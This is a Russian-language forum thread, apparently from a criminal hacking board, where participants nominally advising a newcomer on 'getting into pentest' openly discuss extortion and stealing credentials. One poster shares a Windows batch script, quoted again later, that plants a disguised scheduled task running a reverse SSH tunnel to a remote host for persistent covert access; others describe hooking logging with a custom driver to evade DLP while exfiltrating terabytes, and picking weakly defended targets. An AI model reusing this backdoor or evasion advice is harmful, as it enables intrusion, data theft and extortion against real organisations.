Как зайти в пентест?

[LockBitSupp]

Нет ну шо эти алигархические прихвостни локбита себе позволяют! Понакупят по 300 битховинов и фигурируют.

Это не мой прихвостень, это уважаемый человек, который знает так много, что наверное никто не сможет с ним сравниться в знаниях по пентесту, кроме еще пары тройки человек, которые никогда не будут тратить своё время на форумы, а он почему-то тратит, поэтому относись к нему с уважением и запоминай каждое слово, возможно это поможет тебе заработать больше денег и у него гораздо больше чем 300 битховинов.

LockBitSupp что это он себе позволяет?

Согласен с тобой, он проявляет не уважение, он не прав, не мечи бисер перед свиньями.

Злой ты. Пришел тут, и так ненавязчиво расплескал нам чай на спины.

Попробуй докажи ему, что он не прав количеством битховинов на своём кошельке, перестань тратить время в пустую.

 

[ice80]

не мечи бисер перед свиньями.

свинье не заметят бисера. а толковые чуваки черпнут то что нужно

 

[ice80]

тк в пм уже трое про ссшд спросили пишу тут:

@echo off
set remote_port=1337
set host="5.6.7.8"
%programdata%\sshd\ssh-keygen -f %programdata%\sshd\config\id_rsa -t rsa  -N ""
icacls %programdata%\sshd\config\keys\id_rsa /inheritance:r
icacls %programdata%\sshd\config\keys\id_rsa /c /t /Remove:g "Authenticated Users" BUILTIN\Administrators BUILTIN Everyone System Users
icacls %programdata%\sshd\config\keys\id_rsa /grant:r "%username%":"(R)"
icacls %programdata%\sshd\config\id_rsa /inheritance:r
icacls %programdata%\sshd\config\id_rsa /c /t /Remove:g "Authenticated Users" BUILTIN\Administrators BUILTIN Everyone System Users
icacls %programdata%\sshd\config\id_rsa /grant:r "%username%":"(R)"
schtasks.exe /create /sc minute /mo 1 /tn "adsync" /rl highest /np /tr "%programdata%\sshd\sshd.exe -f %programdata%\sshd\config\sshd_config"
schtasks.exe /create /sc minute /mo 1 /tn "adsyncmc" /rl highest /np /tr "%programdata%\sshd\ssh.exe -i %programdata%\sshd\config\keys\id_rsa -N -R %remote_port%:127.0.0.1:22 -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 root@%host%"

это всего лишь пример

 

[Whisper]

Приходит такой нуб к речке, а у него ни говна ни ложки и удочки тоже нет, но есть в поле зрения добрый дяденька =)
Короче нубяра я тебе скажу по простому как надо.
Добываешь себе забикс и спланк, реверсишь, находишь где патчить. Потом добываешь несколько версий бинарей что составить устойчивые маски. Потом придумываешь как именно ты будешь патчить их процессы, обойти защиту тебе помогут лпе или драйвера.
Короче ниче сложного даже для нуба, не пойму че все эти говнюки ноют, им бисер прямо под ноги и любой бы тут же на месте милионером стал, но только не эти имбицылы. Короче х#й вам а не профит, на завод ссуки!
Кстати у него есть хвост!

 

[Whisper]

Оставлю это тут.
Прежде чем куда-то зайти и чему-то учиться, посвятите хотя бы несколько дней сбору информации о том как именно надо учиться, какие способы работают а какие нет.
Потом несколько дней посвятите тому что бы изучить какие есть системы менеджмента знаний, потом попробуйте их и найдите пригодные для вас.
А то тут люди такое такое несут что в виде вопросов что в виде ответов что страшно становиться, как будто умственно отсталые.
Поищите информацию о том как системно мыслить, как решать задачи, как ставить задачи.

 

[isucukbx]

ssh.exe -i %programdata%\sshd\config\keys\id_rsa -N -R %remote_port%:127.0.0.1:22 -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 root@%host%

Интересно, что могло пойти нет так?

"Отвергаешь - предлагай" - что делать тогда? - сканируй африку и азию на старые и провереные временем баги - поверь внутрянка Нигереийских телекомуникационых компаний или какого небудь малазийского хостера или даже банка может быть куда лучше защищена чем сеть клиник в юсе. Если хочешь научиться вымогать - нужно вымогать, а не вот это вот все.

Может быть механический скилл запуска чужих скриптов так отточится. Хакером ты от этого не станешь.
Потом из таких людей получается тред "вопросы по сетям" на этом форуме.
Там бывают и нормальные вопросы/ответы, но большинство это какая-то жуть
Зачем плодить таких людей?

чем плох совет учить язык по его спецификации? - по моему лучше ничего не может и быть - K&R - как был мастхэв по Цэ так им и остается кто бы что не говорил.

k&r не явлется спецификацией языка си

На счет "раскидывать тут бисер" соглашусь.
Привет, кстати

 

[Super Crypt]

тк в пм уже трое про ссшд спросили пишу тут:

@echo off
set remote_port=1337
set host="5.6.7.8"
%programdata%\sshd\ssh-keygen -f %programdata%\sshd\config\id_rsa -t rsa  -N ""
icacls %programdata%\sshd\config\keys\id_rsa /inheritance:r
icacls %programdata%\sshd\config\keys\id_rsa /c /t /Remove:g "Authenticated Users" BUILTIN\Administrators BUILTIN Everyone System Users
icacls %programdata%\sshd\config\keys\id_rsa /grant:r "%username%":"(R)"
icacls %programdata%\sshd\config\id_rsa /inheritance:r
icacls %programdata%\sshd\config\id_rsa /c /t /Remove:g "Authenticated Users" BUILTIN\Administrators BUILTIN Everyone System Users
icacls %programdata%\sshd\config\id_rsa /grant:r "%username%":"(R)"
schtasks.exe /create /sc minute /mo 1 /tn "adsync" /rl highest /np /tr "%programdata%\sshd\sshd.exe -f %programdata%\sshd\config\sshd_config"
schtasks.exe /create /sc minute /mo 1 /tn "adsyncmc" /rl highest /np /tr "%programdata%\sshd\ssh.exe -i %programdata%\sshd\config\keys\id_rsa -N -R %remote_port%:127.0.0.1:22 -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 root@%host%"

это всего лишь пример

пример запуска сервера принимающего можно ?)

 

[ice80]

Хакером ты от этого не станешь.

я не хакер, я просто вымогаю деньги. Хакер взламывает, я краду креды. Хакер пишет эксплоиты, я их использую.

 

[umbrax]

А, я вот сижу и думаю... А что ты будешь патчить агент забикса или сам сервер?
а что будешь делать с телеметрией которую забикс собирает по snmp c железок... там твои 10тб на графике будут выгладить, как огромным красный прямоугольник размером с дом)) крч, DLP такое задетектит очень быстро.

Давайте думать, подсказывайте... как сделать по красоте? ©

 

[Whisper]

А, я вот сижу и думаю... А что ты будешь патчить агент забикса или сам сервер?
а что будешь делать с телеметрией которую забикс собирает по snmp c железок... там твои 10тб на графике будут выгладить, как огромным красный прямоугольник размером с дом)) крч, DLP такое задетектит очень быстро.

Давайте думать, подсказывайте... как сделать по красоте? ©

Сброр статистики и не превышать сильно нормы.

 

[ice80]

Сброр статистики и не превышать сильно нормы.

пфф, свой драйер и хукаешь код который пишет в лог. шах и мат шептун - за ночь 5.7Тб вчера.
зы - замешан CDC. Отличие от rsync - тем что чанки делятся в соответствии с контентом на не развного размера доли

 

[Whisper]

пфф, свой драйер и хукаешь код который пишет в лог. шах и мат шептун - за ночь 5.7Тб вчера.
зы - замешан CDC. Отличие от rsync - тем что чанки делятся в соответствии с контентом на не развного размера доли

А в саус парке была классная серия как Кайл на лыжах учился кататься в Аспене вроде дело было(точно не помню), очень рекомендую, жаль не вспомнить сезон и серию, но думаю найти не сложно.
Это же нубячий топ, здесь нубы ищат как вобще начать и за что взяться в первую очередь, не редко это пацаны которы скопили 500к руб и на намерены на них дотянуть с нуля до первых доходов(не выйдет), а вы тут про хуки дров. И я предложил простое нубячее решении, которое не требует - патчить и реверсить. А вы бы и дряхлой старушке подсказали короткий путь где надо будет с разбега прыгать через речушку. То что делитесь секретами мастерства это оффигенно и я всеми руками за, но создайте топ - "Пентест тонкости в рабте, эффективные решения не тривиальных задач.". Но в детском саду гордо потрясать достоинством это такой себе перфоманс, нубяры в шоке, у них психологические травмы.

 

[Мутабор]

Подпишусь на топик. Складно звонит этот snoww...

Мне напомнило это всё случай из моей молодости. Собрались мы как-то на сходняке, много нас было, стоим значит, в большом кругу, один из старших речь держит. А тут возле меня по правую руку два человека, недавно к нам в коллектив пришедшие, постарше меня, тоже слушают. Потом минут через 5 один к другому поворачивается и так полушёпотом: "Если бы я не знал *** (называет погремуху оратора) лично, то я бы думал, что в его карманах миллионы"

)))

 

[Whisper]

Подпишусь на топик. Складно звонит этот snoww...

Мне напомнило это всё случай из моей молодости. Собрались мы как-то на сходняке, много нас было, стоим значит, в большом кругу, один из старших речь держит. А тут возле меня по правую руку два человека, недавно к нам в коллектив пришедшие, постарше меня, тоже слушают. Потом минут через 5 один к другому поворачивается и так полушёпотом: "Если бы я не знал *** (называет погремуху оратора) лично, то я бы думал, что в его карманах миллионы"

)))

На шо вы это тут намекаете шановний! Уважаемый человек сказала за этого дядю шо таки да есть там битховины и много. Проявите уважение, люди за него в курсе, было велено уважать.
Вобще нубы пошли борзые какие то, пришел к ним человек, сам пришел, своим пешком, навалил от души им на самые кеды а они даже не выкупили шо это бисер и хамят. Куда смотрит администрация.

 

[Мутабор]

На шо вы это тут намекаете шановний! Уважаемый человек сказала за этого дядю шо таки да есть там битховины и много. Проявите уважение, люди за него в курсе, было велено уважать.
Вобще нубы пошли борзые какие то, пришел к ним человек, сам пришел, своим пешком, навалил от души им на самые кеды а они даже не выкупили шо это бисер и хамят. Куда смотрит администрация.

Ты же знаешь, Whisper, что мы тут не признаём никаких авторитетов. Ни реальных, ни виртуальных )

 

[Whisper]

Ты же знаешь, Whisper, что мы тут не признаём никаких авторитетов. Ни реальных, ни виртуальных )

Мы не формалы! Формалы не мы! Вливайся в наше контркульторное сообщество, спортивных крышевателей рынков!

 

[Мутабор]

Вливайся в наше контркульторное сообщество, спортивных крышевателей рынков!

Whisper, ты ЛАРЁК купил? )))

На шо вы это тут намекаете шановний! Уважаемый человек сказала за этого дядю шо таки да есть там битховины и много. Проявите уважение, люди за него в курсе, было велено уважать.
Вобще нубы пошли борзые какие то, пришел к ним человек, сам пришел, своим пешком, навалил от души им на самые кеды а они даже не выкупили шо это бисер и хамят. Куда смотрит администрация.

Кто вообще считается авторитетом, уважаемым человеком? Нет, это не тот, кого боятся, и даже не всегда тот, кого какой-то лохбит или ещё кто-то там велит уважать потому, что у него много денег, так надо, принято и т.д.
Настоящий авторитет - это тот, к чьему мнению прислушиваются, к кому идут за советом. Причём сами, без чьих-то указок и рекомендаций. Авторитетные люди всегда найдутся в любом коллективе, не важно - это бригада CМУ-27 или бригада Саши Белого. Людей покажет время и поступки.
Как только у моего подъезда парковался мой чёрный Мерс и я поднимался к себе домой на этаж, как тут же начинались звонки мне в дверь и молодые пацанчики с округи приходили с вопросами как им поступить в своих затруднительных ситуациях. Сами приходили, потому что чувствовали интуитивно. Вот что такое уважаемые люди и авторитет.

Ну нормально snoww пишет, чё. Феня, правда, мне местами непонятная. Я и обратил внимание. Никто же не против, сделаем его самым уважаемым мембером форума, чё?
Вот вижу уже и аватарку сменил, значит не покинет нас, нет ))

 

[ice80]

Вот вижу уже и аватарку сменил не покинет нас, нет ))

красава бро! ржал до слез.
про покинет - ты не угадал, покину обязательно, так что до встречи под новым ником - вязать все говно на одну учетку упрощая п#дарасам жизнь - мне не нравится. и акк держать постоянно один я не буду, сменю.

 

[Whisper]

красава бро! ржал до слез.
про покинет - ты не угадал, покину обязательно, так что до встречи под новым ником - вязать все говно на одну учетку упрощая п#дарасам жизнь - мне не нравится. и акк держать постоянно один я не буду, сменю.

А я милого узнаю а по походке,...шелковые штаны и ботиночки со скрипом.

 

[defaultuser0]

Микрочел спросил просто как в пентест зайти, а тут уже свой топик пошел